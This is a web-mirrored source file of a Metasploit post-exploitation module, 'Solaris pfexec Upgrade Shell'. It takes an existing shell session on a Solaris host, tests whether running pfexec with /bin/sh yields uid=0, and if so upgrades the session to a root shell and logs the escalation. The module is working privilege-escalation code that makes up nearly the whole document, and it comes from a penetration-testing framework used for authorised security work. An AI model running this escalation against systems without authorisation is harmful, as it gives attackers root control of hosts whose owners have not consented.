CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/solaris/escalate/pfexec.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8
  include Msf::Post::Solaris::System

9
  include Msf::Post::Solaris::Priv

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Solaris pfexec Upgrade Shell',

16
        'Description' => %q{

17
          This module attempts to upgrade a shell session to UID 0 using pfexec.

18
        },

19
        'License' => MSF_LICENSE,

20
        'Author' => ['bcoles'],

21
        'Platform' => 'solaris',

22
        'References' => [

23
          ['URL', 'https://docs.oracle.com/cd/E19253-01/816-4557/prbactm-1/index.html'],

24
          ['URL', 'http://www.c0t0d0s0.org/archives/4844-Less-known-Solaris-features-pfexec.html'],

25
          ['URL', 'http://solaris.wikia.com/wiki/Providing_root_privileges_with_pfexec']

26
        ],

27
        'SessionTypes' => ['shell']

28
      )

29
    )

30
    register_options [

31
      OptString.new('PFEXEC_PATH', [true, 'Path to pfexec', '/usr/bin/pfexec']),

32
      OptString.new('SHELL_PATH', [true, 'Path to shell', '/bin/sh'])

33
    ]

34
  end

35


36
  def shell_path

37
    datastore['SHELL_PATH'].to_s

38
  end

39


40
  def pfexec_path

41
    datastore['PFEXEC_PATH'].to_s

42
  end

43


44
  def run

45
    unless session.type == 'shell'

46
      fail_with Failure::BadConfig, "This module is not compatible with #{session.type} sessions"

47
    end

48


49
    if is_root?

50
      fail_with Failure::BadConfig, 'Session already has root privileges'

51
    end

52


53
    unless command_exists? pfexec_path

54
      fail_with Failure::NotVulnerable, "#{pfexec_path} does not exist"

55
    end

56


57
    user = cmd_exec('id -un').to_s

58


59
    print_status "Trying pfexec as `#{user}' ..."

60


61
    res = cmd_exec "#{pfexec_path} #{shell_path} -c id"

62
    vprint_status res

63


64
    unless res.include? 'uid=0'

65
      fail_with Failure::NotVulnerable, "User `#{user}' does not have permission to escalate with pfexec"

66
    end

67


68
    print_good 'Success! Upgrading session ...'

69


70
    cmd_exec "#{pfexec_path} #{shell_path}"

71


72
    unless is_root?

73
      fail_with Failure::NotVulnerable, 'Failed to escalate'

74
    end

75


76
    print_good 'Success! root shell secured'

77
    report_note(

78
      host: session,

79
      type: 'host.escalation',

80
      data: "User `#{user}' pfexec'ed to a root shell"

81
    )

82
  end

83
end

84


85